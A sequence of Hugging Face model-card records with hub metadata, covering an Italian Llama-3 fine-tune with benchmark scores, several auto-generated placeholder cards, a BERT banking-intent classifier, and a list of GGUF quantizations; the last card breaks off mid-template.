--- language: - it - en license: llama3 library_name: transformers base_model: meta-llama/Meta-Llama-3-8B datasets: - DeepMount00/llm_ita_ultra model-index: - name: Llama-3-8b-Ita results: - task: type: text-generation name: Text Generation dataset: name: IFEval (0-Shot) type: HuggingFaceH4/ifeval args: num_few_shot: 0 metrics: - type: inst_level_strict_acc and prompt_level_strict_acc value: 75.3 name: strict accuracy source: url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=DeepMount00/Llama-3-8b-Ita name: Open LLM Leaderboard - task: type: text-generation name: Text Generation dataset: name: BBH (3-Shot) type: BBH args: num_few_shot: 3 metrics: - type: acc_norm value: 28.08 name: normalized accuracy source: url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=DeepMount00/Llama-3-8b-Ita name: Open LLM Leaderboard - task: type: text-generation name: Text Generation dataset: name: MATH Lvl 5 (4-Shot) type: hendrycks/competition_math args: num_few_shot: 4 metrics: - type: exact_match value: 5.36 name: exact match source: url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=DeepMount00/Llama-3-8b-Ita name: Open LLM Leaderboard - task: type: text-generation name: Text Generation dataset: name: GPQA (0-shot) type: Idavidrein/gpqa args: num_few_shot: 0 metrics: - type: acc_norm value: 7.38 name: acc_norm source: url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=DeepMount00/Llama-3-8b-Ita name: Open LLM Leaderboard - task: type: text-generation name: Text Generation dataset: name: MuSR (0-shot) type: TAUR-Lab/MuSR args: num_few_shot: 0 metrics: - type: acc_norm value: 11.68 name: acc_norm source: url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=DeepMount00/Llama-3-8b-Ita name: Open LLM Leaderboard - task: type: text-generation name: Text Generation dataset: name: MMLU-PRO (5-shot) type: TIGER-Lab/MMLU-Pro config: main split: test args: num_few_shot: 5 metrics: - type: acc value: 31.69 name: accuracy source: url: https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard?query=DeepMount00/Llama-3-8b-Ita name: Open LLM Leaderboard --- --- **💡 Found this resource helpful?** Creating and maintaining open source AI models and datasets requires significant computational resources. If this work has been valuable to you, consider [supporting my research](https://buymeacoffee.com/michele.montebovi) to help me continue building tools that benefit the entire AI community. Every contribution directly funds more open source innovation! ☕ --- ## Model Architecture - **Base Model:** [Meta-Llama-3-8B](https://huggingface.co/meta-llama/Meta-Llama-3-8B) - **Specialization:** Italian Language ## Evaluation For a detailed comparison of model performance, check out the [Leaderboard for Italian Language Models](https://huggingface.co/spaces/FinancialSupport/open_ita_llm_leaderboard). 
Here's a breakdown of the performance metrics:

| Metric | hellaswag_it acc_norm | arc_it acc_norm | m_mmlu_it 5-shot acc | Average |
|:----------------------------|:----------------------|:----------------|:---------------------|:--------|
| **Accuracy Normalized** | 0.6518 | 0.5441 | 0.5729 | 0.5896 |

---

## How to Use

```python
from transformers import AutoModelForCausalLM, AutoTokenizer
import torch

device = torch.device("cuda" if torch.cuda.is_available() else "cpu")

MODEL_NAME = "DeepMount00/Llama-3-8b-Ita"
model = AutoModelForCausalLM.from_pretrained(MODEL_NAME, torch_dtype=torch.bfloat16).eval()
model.to(device)
tokenizer = AutoTokenizer.from_pretrained(MODEL_NAME)

def generate_answer(prompt):
    messages = [
        {"role": "user", "content": prompt},
    ]
    model_inputs = tokenizer.apply_chat_template(messages, return_tensors="pt").to(device)
    # Note: with a temperature this low, sampling is effectively greedy.
    generated_ids = model.generate(model_inputs, max_new_tokens=200, do_sample=True,
                                   temperature=0.001)
    decoded = tokenizer.batch_decode(generated_ids, skip_special_tokens=True)
    return decoded[0]

prompt = "Come si apre un file json in python?"
answer = generate_answer(prompt)
print(answer)
```

---

## Developer

Michele Montebovi

# [Open LLM Leaderboard Evaluation Results](https://huggingface.co/spaces/open-llm-leaderboard/open_llm_leaderboard)

Detailed results can be found [here](https://huggingface.co/datasets/open-llm-leaderboard/details_DeepMount00__Llama-3-8b-Ita)

| Metric |Value|
|-------------------|----:|
|Avg. |26.58|
|IFEval (0-Shot) |75.30|
|BBH (3-Shot) |28.08|
|MATH Lvl 5 (4-Shot)| 5.36|
|GPQA (0-shot) | 7.38|
|MuSR (0-shot) |11.68|
|MMLU-PRO (5-shot) |31.69|
TarunKM/Nexteer-lora-adapter-45E_third_model
TarunKM
2025-06-11T10:04:05Z
0
0
transformers
[ "transformers", "safetensors", "text-generation-inference", "unsloth", "llama", "trl", "en", "license:apache-2.0", "endpoints_compatible", "region:us" ]
null
2025-06-11T10:03:59Z
---
base_model: unsloth/llama-3.1-8b-bnb-4bit
tags:
- text-generation-inference
- transformers
- unsloth
- llama
- trl
license: apache-2.0
language:
- en
---

# Uploaded model

- **Developed by:** TarunKM
- **License:** apache-2.0
- **Finetuned from model:** unsloth/llama-3.1-8b-bnb-4bit

This llama model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library.

[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
gradientrouting-spar/mc8_badmed_naive_atc-0.0_data_seed-42_model_seed-42_seed_1
gradientrouting-spar
2025-06-11T10:03:28Z
0
0
transformers
[ "transformers", "safetensors", "arxiv:1910.09700", "endpoints_compatible", "region:us" ]
null
2025-06-11T10:03:08Z
--- library_name: transformers tags: [] --- # Model Card for Model ID <!-- Provide a quick summary of what the model is/does. --> ## Model Details ### Model Description <!-- Provide a longer summary of what this model is. --> This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated. - **Developed by:** [More Information Needed] - **Funded by [optional]:** [More Information Needed] - **Shared by [optional]:** [More Information Needed] - **Model type:** [More Information Needed] - **Language(s) (NLP):** [More Information Needed] - **License:** [More Information Needed] - **Finetuned from model [optional]:** [More Information Needed] ### Model Sources [optional] <!-- Provide the basic links for the model. --> - **Repository:** [More Information Needed] - **Paper [optional]:** [More Information Needed] - **Demo [optional]:** [More Information Needed] ## Uses <!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. --> ### Direct Use <!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. --> [More Information Needed] ### Downstream Use [optional] <!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app --> [More Information Needed] ### Out-of-Scope Use <!-- This section addresses misuse, malicious use, and uses that the model will not work well for. --> [More Information Needed] ## Bias, Risks, and Limitations <!-- This section is meant to convey both technical and sociotechnical limitations. --> [More Information Needed] ### Recommendations <!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. --> Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations. ## How to Get Started with the Model Use the code below to get started with the model. [More Information Needed] ## Training Details ### Training Data <!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. --> [More Information Needed] ### Training Procedure <!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. --> #### Preprocessing [optional] [More Information Needed] #### Training Hyperparameters - **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision --> #### Speeds, Sizes, Times [optional] <!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. --> [More Information Needed] ## Evaluation <!-- This section describes the evaluation protocols and provides the results. --> ### Testing Data, Factors & Metrics #### Testing Data <!-- This should link to a Dataset Card if possible. --> [More Information Needed] #### Factors <!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. --> [More Information Needed] #### Metrics <!-- These are the evaluation metrics being used, ideally with a description of why. 
--> [More Information Needed] ### Results [More Information Needed] #### Summary ## Model Examination [optional] <!-- Relevant interpretability work for the model goes here --> [More Information Needed] ## Environmental Impact <!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly --> Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700). - **Hardware Type:** [More Information Needed] - **Hours used:** [More Information Needed] - **Cloud Provider:** [More Information Needed] - **Compute Region:** [More Information Needed] - **Carbon Emitted:** [More Information Needed] ## Technical Specifications [optional] ### Model Architecture and Objective [More Information Needed] ### Compute Infrastructure [More Information Needed] #### Hardware [More Information Needed] #### Software [More Information Needed] ## Citation [optional] <!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. --> **BibTeX:** [More Information Needed] **APA:** [More Information Needed] ## Glossary [optional] <!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. --> [More Information Needed] ## More Information [optional] [More Information Needed] ## Model Card Authors [optional] [More Information Needed] ## Model Card Contact [More Information Needed]
gradientrouting-spar/mc8_badmed_naive_atc-0.0_data_seed-42_model_seed-42_seed_1_epoch_1
gradientrouting-spar
2025-06-11T10:03:07Z
0
0
transformers
[ "transformers", "safetensors", "arxiv:1910.09700", "endpoints_compatible", "region:us" ]
null
2025-06-11T10:02:57Z
--- library_name: transformers tags: [] --- # Model Card for Model ID <!-- Provide a quick summary of what the model is/does. --> ## Model Details ### Model Description <!-- Provide a longer summary of what this model is. --> This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated. - **Developed by:** [More Information Needed] - **Funded by [optional]:** [More Information Needed] - **Shared by [optional]:** [More Information Needed] - **Model type:** [More Information Needed] - **Language(s) (NLP):** [More Information Needed] - **License:** [More Information Needed] - **Finetuned from model [optional]:** [More Information Needed] ### Model Sources [optional] <!-- Provide the basic links for the model. --> - **Repository:** [More Information Needed] - **Paper [optional]:** [More Information Needed] - **Demo [optional]:** [More Information Needed] ## Uses <!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. --> ### Direct Use <!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. --> [More Information Needed] ### Downstream Use [optional] <!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app --> [More Information Needed] ### Out-of-Scope Use <!-- This section addresses misuse, malicious use, and uses that the model will not work well for. --> [More Information Needed] ## Bias, Risks, and Limitations <!-- This section is meant to convey both technical and sociotechnical limitations. --> [More Information Needed] ### Recommendations <!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. --> Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations. ## How to Get Started with the Model Use the code below to get started with the model. [More Information Needed] ## Training Details ### Training Data <!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. --> [More Information Needed] ### Training Procedure <!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. --> #### Preprocessing [optional] [More Information Needed] #### Training Hyperparameters - **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision --> #### Speeds, Sizes, Times [optional] <!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. --> [More Information Needed] ## Evaluation <!-- This section describes the evaluation protocols and provides the results. --> ### Testing Data, Factors & Metrics #### Testing Data <!-- This should link to a Dataset Card if possible. --> [More Information Needed] #### Factors <!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. --> [More Information Needed] #### Metrics <!-- These are the evaluation metrics being used, ideally with a description of why. 
--> [More Information Needed] ### Results [More Information Needed] #### Summary ## Model Examination [optional] <!-- Relevant interpretability work for the model goes here --> [More Information Needed] ## Environmental Impact <!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly --> Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700). - **Hardware Type:** [More Information Needed] - **Hours used:** [More Information Needed] - **Cloud Provider:** [More Information Needed] - **Compute Region:** [More Information Needed] - **Carbon Emitted:** [More Information Needed] ## Technical Specifications [optional] ### Model Architecture and Objective [More Information Needed] ### Compute Infrastructure [More Information Needed] #### Hardware [More Information Needed] #### Software [More Information Needed] ## Citation [optional] <!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. --> **BibTeX:** [More Information Needed] **APA:** [More Information Needed] ## Glossary [optional] <!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. --> [More Information Needed] ## More Information [optional] [More Information Needed] ## Model Card Authors [optional] [More Information Needed] ## Model Card Contact [More Information Needed]
ibrahimbukhariLingua/qwen2.5-7b-en-wikipedia-finance-500-v4
ibrahimbukhariLingua
2025-06-11T10:02:44Z
0
0
transformers
[ "transformers", "safetensors", "generated_from_trainer", "trl", "sft", "base_model:Qwen/Qwen2.5-7B-Instruct", "base_model:finetune:Qwen/Qwen2.5-7B-Instruct", "endpoints_compatible", "region:us" ]
null
2025-06-11T10:02:26Z
--- base_model: Qwen/Qwen2.5-7B-Instruct library_name: transformers model_name: qwen2.5-7b-en-wikipedia-finance-500-v4 tags: - generated_from_trainer - trl - sft licence: license --- # Model Card for qwen2.5-7b-en-wikipedia-finance-500-v4 This model is a fine-tuned version of [Qwen/Qwen2.5-7B-Instruct](https://huggingface.co/Qwen/Qwen2.5-7B-Instruct). It has been trained using [TRL](https://github.com/huggingface/trl). ## Quick start ```python from transformers import pipeline question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?" generator = pipeline("text-generation", model="ibrahimbukhariLingua/qwen2.5-7b-en-wikipedia-finance-500-v4", device="cuda") output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0] print(output["generated_text"]) ``` ## Training procedure This model was trained with SFT. ### Framework versions - TRL: 0.18.1 - Transformers: 4.52.4 - Pytorch: 2.7.1 - Datasets: 3.6.0 - Tokenizers: 0.21.1 ## Citations Cite TRL as: ```bibtex @misc{vonwerra2022trl, title = {{TRL: Transformer Reinforcement Learning}}, author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec}, year = 2020, journal = {GitHub repository}, publisher = {GitHub}, howpublished = {\url{https://github.com/huggingface/trl}} } ```
Kirie/bert-base-banking77-pt2
Kirie
2025-06-11T09:59:15Z
0
0
transformers
[ "transformers", "tensorboard", "safetensors", "bert", "text-classification", "generated_from_trainer", "base_model:google-bert/bert-base-uncased", "base_model:finetune:google-bert/bert-base-uncased", "license:apache-2.0", "autotrain_compatible", "endpoints_compatible", "region:us" ]
text-classification
2025-06-11T09:29:54Z
--- library_name: transformers license: apache-2.0 base_model: bert-base-uncased tags: - generated_from_trainer metrics: - f1 model-index: - name: bert-base-banking77-pt2 results: [] --- <!-- This model card has been generated automatically according to the information the Trainer had access to. You should probably proofread and complete it, then remove this comment. --> # bert-base-banking77-pt2 This model is a fine-tuned version of [bert-base-uncased](https://huggingface.co/bert-base-uncased) on an unknown dataset. It achieves the following results on the evaluation set: - Loss: 1.4827 - F1: 0.7889 ## Model description More information needed ## Intended uses & limitations More information needed ## Training and evaluation data More information needed ## Training procedure ### Training hyperparameters The following hyperparameters were used during training: - learning_rate: 2e-05 - train_batch_size: 32 - eval_batch_size: 16 - seed: 42 - optimizer: Use OptimizerNames.ADAMW_TORCH_FUSED with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments - lr_scheduler_type: linear - num_epochs: 3 ### Training results | Training Loss | Epoch | Step | Validation Loss | F1 | |:-------------:|:-----:|:----:|:---------------:|:------:| | 3.9488 | 1.0 | 313 | 2.6225 | 0.5997 | | 2.0418 | 2.0 | 626 | 1.7204 | 0.7470 | | 1.6508 | 3.0 | 939 | 1.4827 | 0.7889 | ### Framework versions - Transformers 4.52.4 - Pytorch 2.7.1+cu128 - Datasets 3.6.0 - Tokenizers 0.21.1
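## Inference example (sketch)

The card reports F1 but no inference snippet; below is a minimal sketch of using the fine-tuned classifier with the transformers pipeline. The banking77 intent labels are read from the model's config.

```python
from transformers import pipeline

classifier = pipeline("text-classification", model="Kirie/bert-base-banking77-pt2")

# Predict the banking intent of a customer query.
print(classifier("I still have not received my new card, what should I do?"))
```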
RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix-gguf
RichardErkhov
2025-06-11T09:58:46Z
0
0
null
[ "gguf", "endpoints_compatible", "region:us", "conversational" ]
null
2025-06-11T08:35:12Z
Quantization made by Richard Erkhov. [Github](https://github.com/RichardErkhov) [Discord](https://discord.gg/pvy7H8DZMG) [Request more models](https://github.com/RichardErkhov/quant_request) potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix - GGUF - Model creator: https://huggingface.co/suehyunpark/ - Original model: https://huggingface.co/suehyunpark/potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix/ | Name | Quant method | Size | | ---- | ---- | ---- | | [potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.Q2_K.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.Q2_K.gguf) | Q2_K | 2.96GB | | [potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.IQ3_XS.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.IQ3_XS.gguf) | IQ3_XS | 3.28GB | | [potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.IQ3_S.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.IQ3_S.gguf) | IQ3_S | 3.43GB | | [potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.Q3_K_S.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.Q3_K_S.gguf) | Q3_K_S | 3.41GB | | [potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.IQ3_M.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.IQ3_M.gguf) | IQ3_M | 3.52GB | | [potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.Q3_K.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.Q3_K.gguf) | Q3_K | 3.74GB | | [potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.Q3_K_M.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.Q3_K_M.gguf) | Q3_K_M | 3.74GB | | [potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.Q3_K_L.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.Q3_K_L.gguf) | Q3_K_L | 4.03GB | | [potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.IQ4_XS.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.IQ4_XS.gguf) | IQ4_XS | 4.18GB | | 
[potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.Q4_0.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.Q4_0.gguf) | Q4_0 | 4.34GB | | [potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.IQ4_NL.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.IQ4_NL.gguf) | IQ4_NL | 4.38GB | | [potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.Q4_K_S.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.Q4_K_S.gguf) | Q4_K_S | 4.37GB | | [potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.Q4_K.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.Q4_K.gguf) | Q4_K | 4.58GB | | [potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.Q4_K_M.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.Q4_K_M.gguf) | Q4_K_M | 4.58GB | | [potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.Q4_1.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.Q4_1.gguf) | Q4_1 | 4.78GB | | [potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.Q5_0.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.Q5_0.gguf) | Q5_0 | 5.21GB | | [potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.Q5_K_S.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.Q5_K_S.gguf) | Q5_K_S | 5.21GB | | [potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.Q5_K.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.Q5_K.gguf) | Q5_K | 5.34GB | | [potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.Q5_K_M.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.Q5_K_M.gguf) | Q5_K_M | 5.34GB | | 
[potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.Q5_1.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.Q5_1.gguf) | Q5_1 | 5.65GB |
| [potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.Q6_K.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.Q6_K.gguf) | Q6_K | 6.14GB |
| [potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.Q8_0.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.Q8_0.gguf) | Q8_0 | 7.95GB |

Original model description:
---
base_model: barc0/Llama-3.1-ARC-Potpourri-Induction-8B
datasets:
- suehyunpark/induction_arc_inputs_train_bc_trajectories_max1-per-task_tool_token
library_name: transformers
model_name: barc0/Llama-3.1-ARC-Potpourri-Induction-8B
tags:
- generated_from_trainer
- alignment-handbook
- trl
- sft
licence: license
---

# Model Card for barc0/Llama-3.1-ARC-Potpourri-Induction-8B

This model is a fine-tuned version of [barc0/Llama-3.1-ARC-Potpourri-Induction-8B](https://huggingface.co/barc0/Llama-3.1-ARC-Potpourri-Induction-8B) on the [suehyunpark/induction_arc_inputs_train_bc_trajectories_max1-per-task_tool_token](https://huggingface.co/datasets/suehyunpark/induction_arc_inputs_train_bc_trajectories_max1-per-task_tool_token) dataset.
It has been trained using [TRL](https://github.com/huggingface/trl).

## Quick start

```python
from transformers import pipeline

question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="suehyunpark/potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```

## Training procedure

[<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/suehyun/arc-improve/runs/vk5fb3oz)

This model was trained with SFT.

### Framework versions

- TRL: 0.12.1
- Transformers: 4.46.2
- Pytorch: 2.5.1
- Datasets: 3.1.0
- Tokenizers: 0.20.3

## Citations

Cite TRL as:

```bibtex
@misc{vonwerra2022trl,
	title        = {{TRL: Transformer Reinforcement Learning}},
	author       = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallouédec},
	year         = 2020,
	journal      = {GitHub repository},
	publisher    = {GitHub},
	howpublished = {\url{https://github.com/huggingface/trl}}
}
```
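To actually load one of the GGUF files above, one common route is the `llama-cpp-python` bindings, sketched below. The file name and context size are taken from the table; treat the exact parameters as assumptions to adapt to your setup.

```python
from llama_cpp import Llama  # pip install llama-cpp-python

# Q4_K_M is a common quality/size trade-off among the quants listed above.
llm = Llama(
    model_path="potpourri-8b-inst-fft-induction-bc-trajectory-max1-per-task-tool-token-fix.Q4_K_M.gguf",
    n_ctx=4096,
)
output = llm("Describe a simple grid transformation puzzle.", max_tokens=128)
print(output["choices"][0]["text"])
```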
MinaMila/llama_instbase_3b_ug2_1e-6_1.0_0.5_0.75_0.05_LoRa_ACSEmployment_2_cfda_ep4_22
MinaMila
2025-06-11T09:56:43Z
0
0
transformers
[ "transformers", "safetensors", "arxiv:1910.09700", "endpoints_compatible", "region:us" ]
null
2025-06-11T09:56:38Z
--- library_name: transformers tags: [] --- # Model Card for Model ID <!-- Provide a quick summary of what the model is/does. --> ## Model Details ### Model Description <!-- Provide a longer summary of what this model is. --> This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated. - **Developed by:** [More Information Needed] - **Funded by [optional]:** [More Information Needed] - **Shared by [optional]:** [More Information Needed] - **Model type:** [More Information Needed] - **Language(s) (NLP):** [More Information Needed] - **License:** [More Information Needed] - **Finetuned from model [optional]:** [More Information Needed] ### Model Sources [optional] <!-- Provide the basic links for the model. --> - **Repository:** [More Information Needed] - **Paper [optional]:** [More Information Needed] - **Demo [optional]:** [More Information Needed] ## Uses <!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. --> ### Direct Use <!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. --> [More Information Needed] ### Downstream Use [optional] <!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app --> [More Information Needed] ### Out-of-Scope Use <!-- This section addresses misuse, malicious use, and uses that the model will not work well for. --> [More Information Needed] ## Bias, Risks, and Limitations <!-- This section is meant to convey both technical and sociotechnical limitations. --> [More Information Needed] ### Recommendations <!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. --> Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations. ## How to Get Started with the Model Use the code below to get started with the model. [More Information Needed] ## Training Details ### Training Data <!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data 